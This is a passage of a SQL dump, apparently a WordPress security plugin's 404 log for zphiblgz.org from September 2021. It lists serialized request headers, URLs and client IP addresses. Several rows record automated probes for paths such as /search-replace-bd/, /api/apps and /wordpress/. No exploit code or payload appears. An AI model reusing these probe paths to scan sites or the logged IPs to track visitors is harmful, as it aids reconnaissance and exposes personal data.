deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.9\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:9:\"HTTP_HOST\";s:16:\"www.zphiblgz.org\";s:15:\"HTTP_USER_AGENT\";s:121:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:18:\"REQUEST_TIME_FLOAT\";d:1631817507.900269985198974609375;s:12:\"REQUEST_TIME\";i:1631817507;}}','notice','2021-09-16 18:38:28','2021-09-16 18:38:28',72345696,72447288,'http://www.zphiblgz.org/kkrp/site/info',1,0,'101.36.110.241'),(97127,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:13:{s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.9\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:15:\"HTTP_USER_AGENT\";s:121:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:18:\"REQUEST_TIME_FLOAT\";d:1631817455.2216980457305908203125;s:12:\"REQUEST_TIME\";i:1631817455;}}','notice','2021-09-16 18:37:36','2021-09-16 18:37:35',72313408,72397280,'http://zphiblgz.org/getLocale',1,0,'101.36.110.241'),(97126,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:13:{s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.9\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:15:\"HTTP_USER_AGENT\";s:121:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:18:\"REQUEST_TIME_FLOAT\";d:1631817452.4762289524078369140625;s:12:\"REQUEST_TIME\";i:1631817452;}}','notice','2021-09-16 18:37:34','2021-09-16 18:37:32',72606376,72690248,'http://zphiblgz.org/mtja.html',1,0,'101.36.110.241'),(97125,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:13:{s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.9\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:15:\"HTTP_USER_AGENT\";s:121:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:18:\"REQUEST_TIME_FLOAT\";d:1631817448.36499309539794921875;s:12:\"REQUEST_TIME\";i:1631817448;}}','notice','2021-09-16 18:37:29','2021-09-16 18:37:28',72313336,72397208,'http://zphiblgz.org/api/apps',1,0,'101.36.110.241'),(97124,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:13:{s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.9\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:15:\"HTTP_USER_AGENT\";s:121:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:18:\"REQUEST_TIME_FLOAT\";d:1631817444.0289518833160400390625;s:12:\"REQUEST_TIME\";i:1631817444;}}','notice','2021-09-16 18:37:24','2021-09-16 18:37:24',72313224,72397080,'http://zphiblgz.org/h5/',1,0,'101.36.110.241'),(97122,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:9:{s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:18:\"REQUEST_TIME_FLOAT\";d:1631813154.5032100677490234375;s:12:\"REQUEST_TIME\";i:1631813154;}}','notice','2021-09-16 17:25:56','2021-09-16 17:25:54',72706640,72791792,'http://zphiblgz.org/wordpress/',1,0,'69.16.220.88'),(97123,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:12:{s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:12:\"HTTP_REFERER\";s:44:\"http://zphiblgz.org/scholarship/application/\";s:15:\"HTTP_USER_AGENT\";s:108:\"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.0\";s:18:\"REQUEST_TIME_FLOAT\";d:1631814870.8766000270843505859375;s:12:\"REQUEST_TIME\";i:1631814870;}}','notice','2021-09-16 17:54:33','2021-09-16 17:54:31',72734808,72818544,'http://zphiblgz.org/scholarship/application/',1,0,'95.181.151.34'),(97121,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:11:{s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:15:\"HTTP_KEEP_ALIVE\";s:3:\"300\";s:15:\"HTTP_USER_AGENT\";s:109:\"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.0\";s:18:\"REQUEST_TIME_FLOAT\";d:1631812580.958919048309326171875;s:12:\"REQUEST_TIME\";i:1631812580;}}','notice','2021-09-16 17:16:22','2021-09-16 17:16:21',72604936,72688672,'http://zphiblgz.org/scholarship/application/',1,0,'178.206.250.79'),(97120,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:12:{s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:12:\"HTTP_REFERER\";s:44:\"http://zphiblgz.org/scholarship/application/\";s:15:\"HTTP_USER_AGENT\";s:103:\"Mozilla/5.0 (Windows NT 6.1; ) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.72 Safari/537.36\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.0\";s:18:\"REQUEST_TIME_FLOAT\";d:1631808198.8408830165863037109375;s:12:\"REQUEST_TIME\";i:1631808198;}}','notice','2021-09-16 16:03:20','2021-09-16 16:03:19',72605416,72689152,'http://zphiblgz.org/scholarship/application/',1,0,'46.161.11.41'),(97119,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:12:{s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:12:\"HTTP_REFERER\";s:44:\"http://zphiblgz.org/scholarship/application/\";s:15:\"HTTP_USER_AGENT\";s:113:\"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.72 Safari/537.36\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.0\";s:18:\"REQUEST_TIME_FLOAT\";d:1631808199.03993701934814453125;s:12:\"REQUEST_TIME\";i:1631808199;}}','notice','2021-09-16 16:03:19','2021-09-16 16:03:19',72312480,72396216,'http://zphiblgz.org/scholarship/application/',1,0,'46.161.11.41'),(97118,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:12:{s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:12:\"HTTP_REFERER\";s:44:\"http://zphiblgz.org/scholarship/application/\";s:15:\"HTTP_USER_AGENT\";s:114:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.72 Safari/537.36\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.0\";s:18:\"REQUEST_TIME_FLOAT\";d:1631806504.3013141155242919921875;s:12:\"REQUEST_TIME\";i:1631806504;}}','notice','2021-09-16 15:35:06','2021-09-16 15:35:04',72605448,72689184,'http://zphiblgz.org/scholarship/application/',1,0,'154.13.1.165'),(97117,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:13:{s:11:\"HTTP_ACCEPT\";s:96:\"text/html,application/xhtml+xml,application/signed-exchange;v=b3,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:17:\"gzip, deflate, br\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:9:\"HTTP_FROM\";s:26:\"googlebot(at)googlebot.com\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:15:\"HTTP_USER_AGENT\";s:72:\"Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:18:\"REQUEST_TIME_FLOAT\";d:1631806298.3698298931121826171875;s:12:\"REQUEST_TIME\";i:1631806298;}}','notice','2021-09-16 15:31:40','2021-09-16 15:31:38',72138440,72222576,'http://zphiblgz.org/tag/%E6%AC%A0%E7%89%87%E3%81%AE%E9%A3%9B%E6%9D%A5/',1,0,'66.249.65.99'),(97116,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:13:{s:11:\"HTTP_ACCEPT\";s:96:\"text/html,application/xhtml+xml,application/signed-exchange;v=b3,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:17:\"gzip, deflate, br\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:9:\"HTTP_FROM\";s:26:\"googlebot(at)googlebot.com\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:15:\"HTTP_USER_AGENT\";s:72:\"Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:18:\"REQUEST_TIME_FLOAT\";d:1631801325.2035810947418212890625;s:12:\"REQUEST_TIME\";i:1631801325;}}','notice','2021-09-16 14:08:47','2021-09-16 14:08:45',72172016,72272088,'http://zphiblgz.org/n_top/2017/07/line-1.html',1,0,'66.249.65.99'),(97115,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:12:{s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:12:\"HTTP_REFERER\";s:44:\"http://zphiblgz.org/scholarship/application/\";s:15:\"HTTP_USER_AGENT\";s:113:\"Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.0\";s:18:\"REQUEST_TIME_FLOAT\";d:1631797909.1010949611663818359375;s:12:\"REQUEST_TIME\";i:1631797909;}}','notice','2021-09-16 13:11:51','2021-09-16 13:11:49',72605448,72689184,'http://zphiblgz.org/scholarship/application/',1,0,'80.253.235.74'),(97114,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:15:{s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_ENCODING\";s:7:\"deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:35:\"ru-RU,ru;q=0.9,en-US;q=0.8,en;q=0.7\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:30:\"HTTP_UPGRADE_INSECURE_REQUESTS\";s:1:\"1\";s:15:\"HTTP_USER_AGENT\";s:114:\"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.0\";s:18:\"REQUEST_TIME_FLOAT\";d:1631796900.6459510326385498046875;s:12:\"REQUEST_TIME\";i:1631796900;}}','notice','2021-09-16 12:55:02','2021-09-16 12:55:00',72605528,72689264,'http://zphiblgz.org/scholarship/application/',1,0,'37.113.63.13'),(97113,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:17:{s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:14:\"HTTP_SEC_CH_UA\";s:76:\"\\\" Not;A Brand\\\";v=\\\"99\\\", \\\"Google Chrome\\\";v=\\\"65\\\", \\\"Chromium\\\";v=\\\"65\\\"\";s:21:\"HTTP_SEC_CH_UA_MOBILE\";s:2:\"?0\";s:12:\"HTTP_SEC_GPC\";s:1:\"1\";s:15:\"HTTP_USER_AGENT\";s:142:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.183 Safari/537.36 Vivaldi/1.96.1147.42\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:18:\"REQUEST_TIME_FLOAT\";d:1631796271.27851200103759765625;s:12:\"REQUEST_TIME\";i:1631796271;}}','notice','2021-09-16 12:44:33','2021-09-16 12:44:31',72631504,72714600,'http://zphiblgz.org/scholarship/application/',1,0,'5.153.180.30'),(97112,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:17:{s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:30:\"HTTP_UPGRADE_INSECURE_REQUESTS\";s:1:\"1\";s:15:\"HTTP_USER_AGENT\";s:82:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:68.0) Gecko/20100101 Firefox/68.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:18:\"REQUEST_TIME_FLOAT\";d:1631781175.113213062286376953125;s:12:\"REQUEST_TIME\";i:1631781175;}}','notice','2021-09-16 08:32:57','2021-09-16 08:32:55',72636240,72718520,'https://zphiblgz.org/popcorn.php?ti=kung',1,0,'185.191.34.215'),(97111,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:14:{s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:12:\"HTTP_REFERER\";s:45:\"https://zphiblgz.org/scholarship/application/\";s:15:\"HTTP_USER_AGENT\";s:101:\"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.0\";s:18:\"REQUEST_TIME_FLOAT\";d:1631771606.9473841190338134765625;s:12:\"REQUEST_TIME\";i:1631771606;}}','notice','2021-09-16 05:53:28','2021-09-16 05:53:27',72613192,72696176,'https://zphiblgz.org/scholarship/application/',1,0,'185.100.87.250'),(97110,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:13:{s:11:\"HTTP_ACCEPT\";s:96:\"text/html,application/xhtml+xml,application/signed-exchange;v=b3,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:17:\"gzip, deflate, br\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:9:\"HTTP_FROM\";s:26:\"googlebot(at)googlebot.com\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:15:\"HTTP_USER_AGENT\";s:72:\"Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:18:\"REQUEST_TIME_FLOAT\";d:1631770280.1885139942169189453125;s:12:\"REQUEST_TIME\";i:1631770280;}}','notice','2021-09-16 05:31:22','2021-09-16 05:31:20',72172016,72272088,'http://zphiblgz.org/n_top/2017/07/line-1.html',1,0,'66.249.65.97'),(97109,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:12:{s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:12:\"HTTP_REFERER\";s:44:\"http://zphiblgz.org/scholarship/application/\";s:15:\"HTTP_USER_AGENT\";s:130:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.0\";s:18:\"REQUEST_TIME_FLOAT\";d:1631769638.17730998992919921875;s:12:\"REQUEST_TIME\";i:1631769638;}}','notice','2021-09-16 05:20:40','2021-09-16 05:20:38',72605448,72689184,'http://zphiblgz.org/scholarship/application/',1,0,'92.38.136.69'),(97107,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:14:{s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:15:\"HTTP_CONNECTION\";s:9:\"TE, close\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:7:\"HTTP_TE\";s:18:\"deflate,gzip;q=0.3\";s:15:\"HTTP_USER_AGENT\";s:35:\"SiteLockSpider [en] (WinNT; I ;Nav)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:18:\"REQUEST_TIME_FLOAT\";d:1631757557.764853954315185546875;s:12:\"REQUEST_TIME\";i:1631757557;}}','notice','2021-09-16 01:59:19','2021-09-16 01:59:18',72612784,72695720,'https://zphiblgz.org/th1s_1s_a_4o4.html',1,0,'184.154.139.21'),(97108,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:16:{s:11:\"HTTP_ACCEPT\";s:47:\"text/html,application/xhtml+xml,application/xml\";s:20:\"HTTP_ACCEPT_ENCODING\";s:17:\"gzip, deflate, br\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:18:\"HTTP_CACHE_CONTROL\";s:8:\"no-cache\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:11:\"HTTP_PRAGMA\";s:8:\"no-cache\";s:30:\"HTTP_UPGRADE_INSECURE_REQUESTS\";s:1:\"1\";s:15:\"HTTP_USER_AGENT\";s:68:\"Buck/2.2; (+https://app.hypefactors.com/media-monitoring/about.html)\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:18:\"REQUEST_TIME_FLOAT\";d:1631766546.1500489711761474609375;s:12:\"REQUEST_TIME\";i:1631766546;}}','notice','2021-09-16 04:29:08','2021-09-16 04:29:06',72605440,72689208,'http://zphiblgz.org/application',1,0,'44.197.214.40'),(97044,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:10:{s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:15:\"HTTP_USER_AGENT\";s:148:\"Mozilla/5.0 (iPod; U; CPU iPhone OS 4_2_1 like Mac OS X; en-gb) AppleWebKit/533.17.9 (KHTML, like Gecko) Version/5.0.2 Mobile/8C148 Safari/6533.18.5\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:18:\"REQUEST_TIME_FLOAT\";d:1631566904.7590548992156982421875;s:12:\"REQUEST_TIME\";i:1631566904;}}','notice','2021-09-13 21:01:46','2021-09-13 21:01:45',72606368,72690224,'http://zphiblgz.org/search-replace-bd/',1,0,'23.154.177.2'),(97045,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:10:{s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:15:\"HTTP_USER_AGENT\";s:148:\"Mozilla/5.0 (iPod; U; CPU iPhone OS 4_2_1 like Mac OS X; en-gb) AppleWebKit/533.17.9 (KHTML, like Gecko) Version/5.0.2 Mobile/8C148 Safari/6533.18.5\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:18:\"REQUEST_TIME_FLOAT\";d:1631566914.6919720172882080078125;s:12:\"REQUEST_TIME\";i:1631566914;}}','notice','2021-09-13 21:01:56','2021-09-13 